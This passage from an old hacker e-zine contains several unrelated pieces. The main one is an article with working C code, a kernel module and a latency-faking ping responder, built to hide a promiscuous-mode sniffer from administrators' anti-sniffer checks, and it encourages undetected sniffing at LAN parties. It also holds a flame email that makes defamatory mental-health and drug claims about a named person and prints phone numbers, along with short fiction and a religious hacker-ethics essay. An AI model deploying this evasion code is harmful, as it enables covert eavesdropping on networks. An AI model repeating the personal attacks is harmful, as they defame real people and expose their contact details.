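        out.append(struct.pack("!HH", AFI_AUTH, AUTH_SIMPLE)
                   + password.ljust(16, b"\x00"))
    for r in routes:
        out.append(struct.pack("!HH", r.afi, r.route_tag) + _packed(r.ip)
                   + _packed(r.subnet_mask) + _packed(r.next_hop)
                   + struct.pack("!I", r.metric))
    return b"".join(out)


# Constructed sample: a RIPv2 response with the clear-text password "s3cret",
# one ordinary route and one route poisoned with metric 16 (as a Windows 2000
# router doing split horizon with reverse poison would announce it).
SAMPLE_V2 = build_rip(2, [
    Route(AFI_INET, 0, "10.1.0.0", "255.255.0.0", "0.0.0.0", 2),
    Route(AFI_INET, 0, "192.168.5.0", "255.255.255.0", "0.0.0.0", INFINITY),
], password=b"s3cret")
```

Call parse_rip(SAMPLE_V2).warnings to see the poisoned route flagged; feed the
same function the UDP payload of a captured port 520 datagram to inspect a real
announcement.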
DNS Resolver Check

Some sniffers will try to resolve the sniffed IP addresses to aid the user in
identification. This feature can be attacked by an anti-sniffer check. The check
appears as a SYN flood with random destinations, while the checker watches for
the DNS requests made by the sniffing device. If you see DNS requests on the
network while performing this, chances are you have a sniffing device on the
network.

Fix

DNS resolving is due to the gethostbyname() resolver function. You must remove
it from the sniffer code (or disable it) and use an IP-only format. If you want
to resolve addresses anyway, you can always watch the network traffic of the
target sniffer (if it is resolving).

Network Latency Test

- The admin host starts pinging one network interface and records the average
  of its ICMP echo reply times.
- The admin host starts a SYN flood on the network towards non-existent IPs.
- The admin host checks the echo reply statistics after the flood has started.

If the network interface shows a heavy increase in ping reply time, it is due to
the hard network traffic of the flood: because the network card is running in
promiscuous mode, it has to process every packet. This anti-sniffer check works
on the physical law "more work -> more time".

Fix

Some time before the anti anti sniffer patch, I coded libvsk. Libvsk is a
library suite for manipulating ongoing traffic BEFORE the kernel, using this
concept: from userspace I set firewalling rules to DROP certain packets, and
from userspace I open a datalink socket to read the packets that the kernel
drops, at my explicit request via the firewall rules, before the raw socket
layer. With this library you can code lots of nice applications related to
network redirection and similar things.

For more info check http://www.s0ftpj.org and search for libvsk and the example
spf.c. This is coded for kernel 2.2; after I have coded some applications
working under kernel 2.2/2.4, I will port it to *BSD with ipfw and Solaris (or
other systems) with ipf, using system(3) rather than manual setsockopt/ioctl
calls to add filtering rules (it's very hard filling certain structures)...

For eluding the network latency test I coded a simple program that drops any
ICMP echo request before the kernel replies, reads the request and DELAYS the
reply. The admin knows that the card runs in promiscuous mode when he sees a
great increase in echo reply time, such as 0.1 to 3.0; but if you set a delay
such as 3.0 manually under normal conditions, no great increase can be seen when
the flood starts, and in any case it can never be 30 times (3.0 / 0.1) but
lower than 1/0.5 times.

THE CODE:

-- loadable module for the ethernet destination MAC check --
-- for more info read phrack 55 - 12 --

/*
 * # gcc -O6 -c aasp_lkmachk.c -I/usr/src/linux/include
 * # insmod aasp_lkmachk.o device=eth0
 * # rmmod aasp_lkmachk
 *
 * Anti Anti Sniffer Patch (by vecna@s0ftpj.org) - MAC checker module
 */

#define MODULE
#define __KERNEL__

/* The fifteen header names were lost from the published text (the angle
   brackets were stripped) and are left blank here rather than guessed. */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define r_mac sk->mac.ethernet->h_dest   /* received (destination) mac */
#define t_mac true->dev_addr             /* true mac of the interface */

char *device;
MODULE_PARM(device, "s");
struct device *true;
struct packet_type aasp_ip, aasp_arp;

/* Called for every ARP frame seen on the interface. A frame addressed to a
   MAC other than ours (and not the broadcast address) can only be a probe,
   so its ARP header is zeroed before the real ARP handler looks at it. */
int chk_mac_arp(struct sk_buff *sk, struct device *dev, struct packet_type *pt)
{
    /* ARP broadcast: ff:ff:ff:ff:ff:ff is legitimate. (The published code
       chained these comparisons with ==, which does not test every byte in
       C; they are written out here.) */
    if (r_mac[0] == 0xff && r_mac[1] == 0xff && r_mac[2] == 0xff &&
        r_mac[3] == 0xff && r_mac[4] == 0xff && r_mac[5] == 0xff)
        goto end;

    if ((r_mac[0] != t_mac[0]) || (r_mac[1] != t_mac[1]) ||
        (r_mac[2] != t_mac[2]) || (r_mac[3] != t_mac[3]) ||
        (r_mac[4] != t_mac[4]) || (r_mac[5] != t_mac[5])) {
        /* ARP mac spoof detected */
        sk->nh.arph->ar_hrd = 0;
        sk->nh.arph->ar_pro = 0;
        sk->nh.arph->ar_op = 0;
    }

end:
    kfree_skb(sk);
    return 0;
}

/* Same idea for IP: a frame not addressed to our MAC gets its IP length and
   checksum zeroed so the IP layer discards it instead of answering. */
int chk_mac_ip(struct sk_buff *sk, struct device *dev, struct packet_type *pt)
{
    /* read #define(s) after #include(s) */
    if ((r_mac[0] != t_mac[0]) || (r_mac[1] != t_mac[1]) ||
        (r_mac[2] != t_mac[2]) || (r_mac[3] != t_mac[3]) ||
        (r_mac[4] != t_mac[4]) || (r_mac[5] != t_mac[5])) {
        /* IP check - anti spoof detect! */
        sk->nh.iph->tot_len = 0;
        sk->nh.iph->check = 0;
    }
    kfree_skb(sk);
    return 0;
}

int init_module(void)
{
    if (device) {
        true = dev_get(device);
        if (true == NULL) {
            printk("Did not find device %s!\n", device);
            return -EINVAL;
        }
    } else {
        printk("Usage: insmod aasp_lkmachk.o device=device name \n\n");
        return -ENODEV;
    }

    printk("Mac checker module run on %s - by vecna@s0ftpj.org\n", device);
    printk("Full codes of Anti Anti Sniffer Patch can be"
           " downloaded at www.s0ftpj.org\n");

    /* hook both IP and ARP; the handlers run next to the normal ones */
    aasp_ip.dev = true;
    aasp_ip.type = htons(ETH_P_IP);
    aasp_ip.func = chk_mac_ip;
    aasp_arp.dev = true;
    aasp_arp.type = htons(ETH_P_ARP);
    aasp_arp.func = chk_mac_arp;

    dev_add_pack(&aasp_ip);
    dev_add_pack(&aasp_arp);
    return 0;
}

void cleanup_module(void)
{
    dev_remove_pack(&aasp_ip);
    dev_remove_pack(&aasp_arp);
    printk("Anti Anti Sniffer Patch - MAC checker module unload\n");
}

-- fake network latency test:

/* Fucker Latency of test for Anti Anti Sniffer Patch */

#include "libvsk.h"   /* www.s0ftpj.org for more info */
/* one further system header name was lost from the published text */
#include

extern int errno;

#define fatal(M) { \
    perror(M);     \
    exit(0);       \
}

#define IPSIZE    sizeof(struct iphdr)
#define ICMPSIZE  sizeof(struct icmphdr)
#define IIPKTSIZE sizeof(struct iipkt)

int check_dup(struct iipkt *);
void build_reply(struct iipkt *, struct sockaddr_in *, struct iipkt *);
unsigned short ip_s(unsigned short *, int);

int main(int argc, char **argv)
{
    int dlsfd, offset, forward, hdrincl = 1, pkt_info[4], x;
    char ipdst[18], *rcvd;
    struct ifreq ifr;
    struct in_addr in;
    struct iipkt *reply = malloc(IIPKTSIZE);

    printf("\t Anti Anti Sniffer Patch for elude latency test\n");
    printf("\t by vecna - vecna@s0ftpj.org - www.s0ftpj.org\n\n");

    if (argc != 3) {
        printf(" usage %s interface fakedelay\n\n", argv[0]);
        exit(0);
    }

    printf(" running on background\n");
    if (fork())
        exit(0);

    /* libvsk filter: inbound ICMP echo requests for this interface's address */
    pkt_info[0] = pkt_info[1] = ICMP_ECHO;
    pkt_info[2] = 0;
    pkt_info[3] = 0xFFFF;

    /* look up the local address of the interface */
    x = socket(PF_INET, SOCK_DGRAM, IPPROTO_IP);
    strncpy(ifr.ifr_name, argv[1], sizeof(ifr.ifr_name));
    if (ioctl(x, SIOCGIFADDR, &ifr) < 0)
        fatal("unable to look local address");
    memcpy((void *)&in, (void *)&ifr.ifr_addr.sa_data + 2, 4);
    strcpy(ipdst, (char *)inet_ntoa(in));
    close(x);

    /* the firewall rule drops the echo requests before the kernel answers
       them; the datalink socket dlsfd still gets to read them */
    dlsfd = set_vsk_param(NULL, ipdst, pkt_info, argv[1], IPPROTO_ICMP,
                          IO_IN, IP_FW_INSERT, 0, 0);
    if (dlsfd < 0)
        fatal("set_vsk: IP_FW_INSERT");
    if ((offset = get_offset(dlsfd, argv[1])) < 0)
        fatal("get device offset");

    /* the packet sits at rcvd + offset, so the buffer must hold both (the
       published code allocated only IIPKTSIZE bytes) */
    if ((rcvd = malloc(offset + IIPKTSIZE)) == NULL)
        fatal("malloc");

    /* raw socket with IP_HDRINCL to send the hand-built replies */
    if ((forward = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP)) == -1)
        fatal("forward socket - SOCK_RAW");
    if ((x = setsockopt(forward, IPPROTO_IP, IP_HDRINCL, &hdrincl,
                        sizeof(hdrincl))) == -1)
        fatal("setsockopt - IP_HDRINCL");

    while (1) {
        struct iipkt *packet;

        if (read(dlsfd, rcvd, offset + IIPKTSIZE) < 0)
            fatal("read on datalink socket");
        /* the published code used a cast-as-lvalue gcc extension here */
        packet = (struct iipkt *)(rcvd + offset);

        if (check_dup(packet))
            continue;

        if (check_packet(packet, IPPROTO_ICMP)) {
            struct sockaddr_in sin;

            build_reply(packet, &sin, reply);
            usleep(atoi(argv[2]));     /* the fake delay, in microseconds */
            x = sendto(forward, (char *)reply, ntohs(reply->ip.tot_len), 0,
                       (struct sockaddr *)&sin, sizeof(struct sockaddr));
            if (x < 0)
                fatal("sendto on forwarding packet");
        }
        memset(packet, 0, IIPKTSIZE);
    }
    free(rcvd);   /* never here */
}

/* Turn the captured echo request into an echo reply: swap addresses, fix the
   ICMP type, recompute both checksums, fill in the destination sockaddr. */
void build_reply(struct iipkt *packet, struct sockaddr_in *sin,
                 struct iipkt *reply)
{
    memcpy((void *)reply, (void *)packet, IIPKTSIZE);

    reply->ip.id = (getpid() & 0xffff) ^ packet->ip.id;
    reply->ip.saddr = packet->ip.daddr;
    reply->ip.daddr = packet->ip.saddr;
    reply->ip.check = ip_s((u_short *)&reply->ip, IPSIZE);

    reply->icmp.type = ICMP_ECHOREPLY;
    reply->icmp.checksum = 0x0000;
    reply->icmp.checksum = ip_s((u_short *)&reply->icmp,
                                ntohs(packet->ip.tot_len) - IPSIZE);

    /* setting sockaddr_in structures */
    sin->sin_port = htons(0);
    sin->sin_family = AF_INET;
    sin->sin_addr.s_addr = reply->ip.daddr;
}

/* The datalink socket may hand us the same datagram twice; answer it once. */
int check_dup(struct iipkt *packet)
{
    static int last_id;
    int id = htons(packet->ip.id);

    if (id == htons(last_id))
        return 1;
    last_id = packet->ip.id;
    return 0;
}

/* Standard one's-complement Internet checksum over nbytes of data. */
u_short ip_s(u_short *ptr, int nbytes)
{
    register long sum = 0;
    u_short oddbyte;
    register u_short answer;

    while (nbytes > 1) {
        sum += *ptr++;
        nbytes -= 2;
    }
    if (nbytes == 1) {
        oddbyte = 0;
        *((u_char *)&oddbyte) = *(u_char *)ptr;
        sum += oddbyte;
    }
    sum = (sum >> 16) + (sum & 0xffff);
    sum += (sum >> 16);
    answer = ~sum;
    return answer;
}

--

Ideas for new anti sniffer (or anti anti anti sniffer :) ?

Do the same work used in the network latency test, but use TCP packets for the
network statistics. TCP can be used too: think of SYN packets to port 0; any
host replies with RST+ACK, so you can use the RST+ACK reply time to trace the
network statistics and to view the REAL network congestion after the flood
starts. BTW, this system cannot be accurate for some things, such as:

- local and remote load average, independent of the network...
- your local network device congestion due to your own flood
- network driver, RAM, CPU, kind of device
- a program running on the datalink/raw layer
- other?

Using network restrictions is a good idea for detecting promiscuous cards; this
can be tested with systems on your network that you administer yourself or with
your friends' ... or in other cases, such as a LAN party, it is easy to put in a
network card without an IP address and with ARP filtering (to drop any ARP
broadcast), which means that you may sniff without problems :)

/* Editor's Note: Sorry about the translation, vecna, I was tired! */

[The Wait (fiction)]=============================================[Digital Ebola]

The Wait
Digital Ebola

Night. Desert. Passed out in the sand was a man. He started to come to. Groggy,
disoriented, the moon was bright. The man stood up. His legs almost buckled
under his weight. The man held fast. Standing, he started to wonder where he
was. He began to wonder who he was, and why he was there. He was chilled by the
night air.
A predatory bird of some form screeched in the distance. The man began to walk. As he started to walk, the man's mind began asking the seemingly unanswerable questions. Here he was in the desert with no clue as to why or how; he did not even know his own name.

First things first, the man thought. Inventory. He was wearing blue jeans, a white shirt, and boots. His hair was kept short, and beard stubble was starting to develop. He guessed he was in his late 20's, early 30's. He continued to walk, checking the contents of his pockets. In his breast pocket, there was a pack of cigarettes. Do I smoke, thought the man to himself. He did not know. He checked his other pockets. He produced a silver Zippo lighter and a crumpled piece of paper. Sticking a cigarette in his mouth, he started to pray the lighter worked. He did not care if he smoked or not; he needed the absolute normality of something making sense. He flicked the lighter. Click. Nothing. Click. Nothing. Sighing, the man flicked once more, producing a flame. As he lit the cigarette, he inhaled. The man did not cough. As the easing calm of the cigarette rushed through his veins, his mind began to become clear. He realized that he was still clutching the crumpled piece of paper. He unfolded it and read it:

John, I hope you have a great time on your vacation, I miss you! With love, Maria

Now the man was more confused. Was he John? He kicked at the sand as he began to climb a sand dune. He finished his cigarette and flicked it into the sand. The moon shone bright, and from the top of the dune, all he could see was more sand. He stopped. "WHO AM I?", he screamed. He was answered by a coyote's howl. There was no one else. Desperate to get answers, he began to walk even faster. The faster he walked, it seemed, the faster his mind would race. Over and over the questions kept pounding him. And over and over, the answers eluded him. There was nothing on this chilly night to help him.

He kept pace, and began to sing some tune. He was not happy, but singing helped get his mind off the questions. Never before in his memory had he felt so alone; although he could not remember a single detail of his life, he knew that he had never before been overcome by the misery he was undergoing.

The sun began to rise. As the sun began to rise, the man noticed that he was really thirsty. His mouth was drier than the desert he traversed, and his tongue was numb. He was almost out of cigarettes, and his hopes of finding his answers were fading. He estimated that he had been walking about 7 hours, and the thoughts of leaving this horrible place were non-existent. As he topped the next dune, he heard a vehicle. His pulse rose. He raced to the very top of the dune. He could see a city! There was a truck coming towards him. HEY! The man yelled. His throat was dry. He yelled again. The truck seemed to accelerate. The man ran down the dune. When the man reached the truck, its lone driver stopped, and opened the door. Before the man could utter a word, the driver produced a high-powered rifle. The only audience for the gunshots was the driver and the vultures overhead.

The man awoke. He was strapped in a hospital bed. He tried to cry out. He could make no sound. A nurse came in. The man tried to speak, but the nurse just ignored him, and walked out the door. A few minutes later, a doctor came into his room with the nurse. "Ahh, Mr. Hammerman, I see that you have awakened....", chided the doctor. And with that, the nurse handed the doctor a syringe, and the doctor injected the man, forever dooming him to the desert.

Night. Desert. The man awoke....

[Carolyn Does It Again]======================[Why Won't This Bitch Just Go Away]

Date: Tue, 10 Jul 2001 22:55:39 -0500 (CDT)
From: Digital Ebola
To: dc-stuff@dis.org
Subject: Carolyn does it again.

Hi! I am Digital Ebola. Many of you remember me from such escapades as "Drunk Man on Couch, Defcon 7" and "They can't declare war!".
I have recently acquired the entire ACPO/Carolyn Meinel aka Granny Bitch Who Derails Trains with Timex Sinclair story, and I wish to share it. The below items were not written by me, but by a close friend who wishes to remain anonymous. Enjoy!

Digital Ebola
www.legions.org
www.legions.org/~digi/
"Network penetration is network engineering, in reverse."

----------------------------------------------------------------------

I have watched as Carolyn has slandered ACPO in much the same way that she slandered Bronc and Jerico. The Board of Directors for ACPO won't respond. They don't want to make a big to-do of it. The Board of Directors believe that, much like a cold, she will go away. I hate to see good people like Natasha slandered by this 'woman'. I prepared a response that they would not release. So I will.

---

In early March, Carolyn Menial posted the address of ACPO, along with PedoWatch.org, Cyberarmy.org, and Condemned.org on her site as an example of white hats who were working to eliminate child pornography and child predators from the network. Natasha, the Founder of ACPO, became aware of this and was concerned about the linking of ACPO to 'hacking', even in the 'white' sense. Information regarding Carolyn's webpage was sent to ACPO's contacts in each Organization.

Almost two years ago, ACPO made the strategic decision to rely on traditional activist techniques, while supplementing the technical ability of law enforcement agencies. The rationale being that child pornography, at its core, is not a technology issue, but a human issue. Technology is used to facilitate the commission of the crime, by transmitting the contraband over geographic distances and linking pedophiles worldwide. In this transition, ACPO (formerly ACPM) divested itself of the 'Hacker' moniker. This was done because it was a hurdle to interfacing with law enforcement allies who were also working to handle and eliminate the electronic movement of child pornographic images.

It is unfortunate that 'Hacker' has come to be synonymous with criminals; however, the crusade to rectify its misuse would only detract from our mission.

On March 17, 2001 Natasha Grigori sent the following email to Carolyn Menial:

>Dear Carolyn Menial,
>
>It was brought to my attention that on your site, happyhacker.org,
>there is a story[1] referring to AntiChildporn.org as a group of
>white hat hackers. The Antichildporn Organization is a Not For
>Profit corporation registered in the State of Minnesota. We are
>not hackers, of any color hat or alignment. Our mission is focused
>on educating and facilitating law enforcement agencies in the
>elimination of child pornography on the net. To liken us to hackers,
>in any regard, is tantamount to defamation of character. We request
>that you remove the reference to us, or correct the cited page below
>to omit the reference to white hat hackers.
>
>http://www.happyhacker.org/defend/vigilante.shtml
>

Carolyn promptly responded to Natasha and the Board of Directors. Her response, though having the tone that one would take when trying to explain to a child why he should not put kitty into the washing machine, led Natasha and the BOD to believe that they could quickly resolve this matter.

> I'm sorry that you consider white hat hackers to be evil. Perhaps you are
> not aware of what white hat hackers, and hackers in general, are? We are
> computer professionals with exceptional skills (as promoted on our web site,
> and widely called "white hat hacking"). We do more than most people realize
> to combat crime on the Internet, as well as develop free software such as
> the world's most widely used web server (Apache) and the world's third most
> widely used operating system (Linux). You also may wish to do a search on
> the word "hacker" at Amazon.com. You will find books that chronicle the many
> good works done as a community, nonprofit service by hackers. For example,
> you will learn that hackers invented email and newsgroups.
>
> How about checking out our web site? You will see that we take a hard line
> against computer crime happyahcker.org/crime/. Our "Have a great life"
> section (happyhacker.org/greatlife/) reports news from our many volunteers.
> In fact, the only page on our web site that mentions your organization is
> devoted to offering computer experts (HACKERS) opportunities for community
> service (happyahcker.org/defend/vigilante.shtml). If you check out
> happyahcker.org/news/ and go back a ways, you will find that computer
> criminals have waged quite a war trying to drive us off the Internet.
>
> If you decide, after reconsidering this, that you still do not wish the
> services of computer experts with exceptional skills, please let me know
> and we will remove you from our opportunities for community service.
>

A member of the Board of Directors, Doug Stead, was the first to receive this letter and responded to Carolyn. In his letter he elaborated on the reasoning behind the distancing from 'hacking', even 'white hat hacking', using his usual lack of tact.

> Hi Carolyn,
>
> I am a Director of the ACPO organization. I would like you to
> understand why we take the position we do with regards to white hat hacking.
>
> We have in the past had a good relationship with white hat hackers. We
> however are trying to build ties with Law Enforcement, who can not
> be associated in any way with criminal activities. Hacking, no matter if for
> good, is a crime, and this brings us into conflict with Law
> Enforcement.
>
> Vigilantism and the criminal justice system are mutually exclusive,
> as one is rightly-so bound by the rule of law, and the other is not. That
> our goals are the same, I hope, does not out-weigh the potential damage
> done to the trusted lines of communication we have built. The old saying
> comes to be true, "two wrongs don't make a right", and a bad guy doing good
> is still a bad guy.
> Hence we (ACPO) can have nothing to do with crime of
> any kind.
>
> I wish you all the best, and hope that you never get caught. Cheers,
>
> Doug Stead

Apparently this did not sit well with Carolyn. Did she fear that she would be caught? I do not know. I do know that her reply seemed to foam at the mouth much in the same way that would cause a veterinarian to put down a dog for fear of rabies.

>From: Carolyn Meinel
>
>First, my apologies if Mr. Stead's email was forged by an enemy of your
>organization. If it was forged, please ignore the rest of this email.
>
>Hacking is not a crime. I'm surprised that even after reading my attempt to
>help you with this, that you still insist it is crime.
>
>Everywhere my web site upholds legal behavior and insults and attacks
>criminal actions. I take offense at your suggestion that I commit crime
>("hope you never get caught"). Before you accuse anyone of computer crime,
>especially anyone who crusades against computer crime, you ought to consult
>first with your conscience, and secondly with a lawyer.
>
>The whole point of proper use of the English language is to keep definitions
>the same. When you and your associates try to redefine hacking, and in
>particular white hat hacking, as crime, you libel those who have never
>broken the law such as predator-hunter.com, which use hacking skills to
>assist and train law enforcement. (We at happyhacker.org have also helped
>train law enforcement.)
>
>You say you used to work with white hat hackers. Either they were really
>white hats, and did not break the law, or they broke the law and should
>therefore be called black hats. If you were using criminal services, your
>organization is guilty of crime.
>
>If you were using the white hat term in the normal sense (AKA the Lone
>Ranger), then you are treating your volunteers unfairly and may be in danger
>of prosecution for libel.
>
>Either way, you are in trouble. Any organization that works with law
>enforcement should be doubly careful to avoid breaking the law. It's also
>not wise to accuse a journalist who writes approximately one popular book
>per year of committing crime.
>
>Unless I get a REALLY good explanation of what you people are up to, I will
>move your group from happyhacker.org/defend/ to happyhacker.org/sucks/ .
>Your group will join Se7en's crusade in my upcoming book as an example of
>the hazards of Internet groups that claim to fight kiddie porn.
>
>Given the seriousness of your accusations against your volunteers and me, if
>we communicate further, it should be via phone. Please call me at
>505-281-9675 if this was really your email.

If memory serves, there are some questions as to the legality of Carolyn's actions.
http://www.attrition.org/shame/www/investigated.html

And then there is plagiarism (not good for a world-class author like Carolyn):
http://www.attrition.org/shame/www/bo-cm.plag.01.html

And then again, there is the slander and libel (even before ACPO):
http://www.attrition.org/slander/

And then there is drug use:
http://www.attrition.org/shame/www/drugs.001.html

Perhaps this explains 'Happy Hacker'. Hmm. Should I go on?

Now, where was I? Ahh. After this little letter, Doug called Carolyn, in part to find out what was going on, and also with concern that her mental state was degrading and that she may do something to harm herself. Unfortunately... um, we don't have a carbon copy of that phone call. After the phone call, Doug sent this email out:

>
>Hello,
>
>I just got off the phone with one Carolyn Menial, who is very upset
>with me for my putting the words hacker and criminal together in the
>same sentence. She was really upset, and at times almost incoherent.
>She did not like my 2nd email to her any better and did not consider
>it a suitable apology. Albeit I don't think I have anything to
>apologize for, she nevertheless hung up on me after about 5 minutes
>of listening to her rant and rave.
>
>I suspect there is something else going on here; she claims death
>threats have been made against her and that she and her organization
>have been the target of millions of dollars worth of damage done by
>cyber attacks by "computer criminals". Extreme paranoia combined with
>a large dollop of persecution together with a very aggressively
>defensive posture.
>
>I suspect that I and perhaps ACPO have not heard the last of this
>person. She claims to be a forensic computer professional, a book
>writer and with powerful connections. I would not be at all surprised
>to see her attack the ACPO organization on her web site and in any
>book she may publish. Certainly well beyond any reasonable action,
>even if I had indeed slandered or libeled her.
>
>This is of course not the case, as my original email was not broadcast
>to anyone, even the BoD of ACPO, and went instead directly back to her
>as a reply to her email.
>
>Cheers, and who said this would be easy, or that there was any common
>about common sense!
>
>Doug

Now, Carolyn -- not to be outdone -- decided to direct her angst against the world at Doug and ACPO. Most recently on her site is this recent tirade against ACPO and Doug. Interestingly enough, four of her seven paragraphs deal directly with Doug -- the director who tried to gently tell her to go do something with herself -- and likely also gave a few suggestions on how to do it.

Now, to address the issues and slander on her webpage:

>Antichildporn.org disintegrating!
>
>Founder and leader Natasha Grigori has, according to their web site,
>taken a leave of absence for unspecified medical reasons. Their
>webmaster has quit. According to our sources, she quit when she realized
>she was being exploited. The remainder of Antichildporn.org is trying to
>cover it up.
First, Natasha Grigori has taken a leave of absence for medical reasons. She will be at Defcon this year, yes. Those who know her and know of her situation also know that this may be her last Defcon. Unfortunately her cancer has progressed beyond what may be treated. It is rare to find an individual willing to campaign with such passion on an issue as Natasha Grigori. At times it is her anger and hate of those who abuse children, much in the same way as she was abused, that keeps her going. Yes, hate is powerful, and sometimes it will keep us going long after everything else has failed.

>The former webmaster of the ACPO resigned due to time
>constraints and an inability to continue to volunteer their services -
>nothing more. A new webmaster has since volunteered and taken over
>administration of the website.
>
>A Federal investigation is rumored to be in progress. It happens to be
>child sexual abuse to recruit children to troll the Web for porn and
>report instances of kiddie porn. In the case of Antichildporn.org, these
>children were not even reporting kiddie porn to the authorities.
>Instead, they report directly to a form on the Antichildporn.org web
>site. Under questioning,
>the leaders of Antichildporn.org were unable to cite a single instance
>of actual prosecutions arising from these reports.

ACPO is unaware of any ongoing investigation, although considering Meinel's status as a confidential FBI informant (listed status "MI" and "PS", "MI" indicating that she suffers from a mental or emotional dysfunction, and that all information must be scrutinized as such (for more on her mental dysfunction, see http://www.attrition.org/shame/www/wacko.001.html), "PS" indicating that she is a Probable Suspect - http://www.antionline.com/cgi-bin/News?type=antionline&date=07-26-1999&story=Route.news), she may be trying to have one started - although the following quote probably sums up how seriously the FBI would take her accusations:

"That bitch calls me every single fucking day. That chick is nuts. I'm afraid to even answer my phone anymore." -- Washington, D.C. FBI Agent Mike Bellis talking about Carolyn Menial - (http://www.genocide2600.com/~tattooma/quotes.txt).

While Meinel correctly states that it is "child sexual abuse to recruit children to troll the web for porn", the ACPO does nothing of the sort. Meinel knows this, which is why the accusation is implied. In fact, in the liaison job description posted plainly on the ACPO website @ http://www.antichildporn.org/liaison.cfm, it is specifically stated that liaisons are _not_ asked to locate child pornography. There is a form that exists on the ACPO website to report instances of child pornography; however, contacting the authorities is encouraged. The form simply facilitates a means by which child pornography can be reported by those wishing to maintain their anonymity, and instances of child pornography reported to the ACPO are given to the proper authorities.

>Who the heck are these guys? Natasha is an alias. According to our
>sources, she is well-meaning, but naive. Most of the rest of the
>AntiChildPorn points of contact use aliases. Doug Stead, who is listed
>as their "Vice Chairperson," was careless enough to leave a message on
>Carolyn Meinel's answering machine in which he claimed to be "The
>director" (not even "a" director) "of the International Society for
>Policing Cyberspace ." Of course, as a reporter,
>I (Carolyn) am saving that tape.

Natasha is an alias. After being abused by her father, she changed her name, though not through the legal system, rather than carry the mantle as a reminder of the horrors she survived. Doug Stead is on the Board of Directors for the International Society for Policing Cyberspace, and is plainly listed on the directors page of the International Society for Policing Cyberspace as such (http://www.polcyb.org/directors.html).

A much more interesting question is 'Who the heck is Carolyn Meinel, and what would possess her to libel and attack an organization that wants to end child pornography and identify pedophiles?'

http://www.attrition.org/shame/index2.html
http://www.pervertedlogic.com/pserv/old/meinel.htm
http://www.dis.org/shipley/cpm/
http://www.dhp.com/~fyodor/meinelfraud.txt

>Since he was not listed on the Society for Policing Cyberspace
> web site,

www.polsci.org is not the website for the organization being discussed, www.polcyb.org is - in fact, the domain polsci.org isn't even registered.

$ whois polsci.org
[whois.crsnic.net]

Whois Server Version 1.3

Domain names in the .com, .net, and .org domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

No match for "POLSCI.ORG".

Again, I am amazed at her UberHaxor Happy Hacking skills -- able to find sites that don't even exist.

> I spoke with him over the phone (604-527-1100) to try to clear up the
>problem. He directed me to , the same site I had
>been look at, which claims to represent that organization. He said it
>was, in fact, the web site of the organization he claims to direct. "Just
>phone them, they'll vouch for me," he said.

As previously mentioned, Doug Stead is plainly listed on the Directors page of the site Meinel mentions (as Douglas Stead) she "had been look at". Since Meinel obviously won't take the time to proofread her own story, one wonders how much time (if any) was spent investigating the credibility of her "sources".

>I phoned one of the people listed there as a director, Phil Ortega, CEO
>of World net Technologies. He has never heard of Stead. And Stead is not
>listed anywhere on their web site.

Stead is listed on the website, but there is no mention of a Phil Ortega on the website. Meinel's claims are so inaccurate one must wonder whether she even looked at the sites being discussed or has fabricated these claims as a result of her documented mental issues.

>I have asked around the computer forensics community. They have never
>heard of Stead. I asked Stead for his credentials in forensics. He first
>gave out the name of some university, then backpedaled and said he was
>not a forensics person.

Doug Stead never claimed to be a member of the forensics community. He has provided support to bring RCMPs to training and conferences. Doug Stead has also spoken at some of these conferences. Doug Stead is the President of EAP (Entrepreneurs against Pedophilia). Doug Stead is the Owner of Tri-M Systems. Other members of the board at the time are involved in the forensics community. This includes Don Withers
http://www.google.com/search?hl=en&safe=off&q=%22Don+Withers%22+%2BForensics
and Al Wiinikainen
http://www.hightechcrimecops.org/advisory.htm
http://www.goldcrew.com/

>Are any of those people at AntiChildPorn for real? Will they someday
>turn up on our Busted! <../crime/busted.shtml> page? We hope SOMETHING
>will happen to set an example -- adults shouldn't recruit children to
>sift through porn sites for them.

Carolyn Meinel for real?
Will she someday turn up on numerous web pages exposing her as an unstable charlatan? She already has.

In the War against child pornography and child abuse by pedophiles, the enemy of my enemy is my friend. Conversely, my enemies are friends of my enemy.

[Love's Freedom]=======================================================[Raschid]

"Do not conform any longer to the pattern of this world, but be transformed by the renewing of your mind." -Romans 12:2

In the last issue of Keen Veracity (Issue 10) I discussed the purpose of Warzael Zarcae, and the need for a new class of hacker: the paladin. I have also discussed in general terms what type of individual this new rank would take, in lectures delivered and in personal discussions. Zarcae's ideas have always been clear on what sort of person this paladin should be: wise in knowledge, gentle in carrying out his understanding, and above all, joyous with his zeal for high living.

Legalism (the idea of slavishly following a set of rules) is the antithesis of the right state of mind for the hacker paladin. Instead, we should so order our lives that rules aren't necessary; doing the good is as natural to us as breathing. Obedience to the higher moral law ought to be a joy; not because we expect to receive anything from it, but because we enjoy the action itself. Consider: when a man is in love with someone, he doesn't perform actions simply to garner favor. If he did that, then his relationship wouldn't be worth much (or last long; people aren't as stupid as they appear). We do actions in love because it is a joy and a blessing for us to do so. In the same way, our duties as Zarcadians should be carried out in full happiness, come what may. Even if our endeavors lead to our persecution and capture by government authorities, be of good cheer! You're serving a higher cause; history will judge you not as criminals, but as the leaders of the moral revolution in the underground. Eventually, even authorities will come to realize that not all of us are evil, and out for destruction.

"We have this treasure in jars of clay to show that this all-surpassing power is from God and not from us. We are hard pressed on every side, but not crushed; perplexed, but not in despair; persecuted, but not abandoned; struck down, but not destroyed." -Corinthians (I) 4:7-9

Daily let us lift our hands in benediction and happiness that it has fallen to our shoulders to work this marvelous revolution in the underground. We are the ones shouting in joy, waving our arms at our brethren to join us, sounding the call to battle against the Dark. We, weak vessels of mud and filth, have been given this beautiful chance to wipe clean, and by our cleanliness, to become an example to the underground of what true goodness is. Let us bless daily all those who have sneered to our faces, members who've apostatized our ethics, and everyone who has ever read our papers, heard a Zarcadian lecture, and mocked heartily our beliefs. It is these people who most need to hear a message of hope for the underground; we are no longer living in bondage, but singing in the full daylight, songs of joy, and unending praise.

What type of man is this new hacker paladin? The best example is hundreds of years old, in an old, old story:

"A knight there was, and he a worthy man,
Who, from the moment that he first began
To ride about the world, loved chivalry,
Truth, honor, freedom and all courtesy."
-Geoffrey Chaucer, "The Canterbury Tales"

Our joy should be in doing right; we should be so pre-occupied with honoring others that we have no time for our own avarice and misdeeds.

"Finally brothers, whatever is true, whatever is noble, whatever is right, whatever is pure, whatever is lovely, whatever is admirable - if anything is excellent and praiseworthy - think about such things." -Philippians 4:8

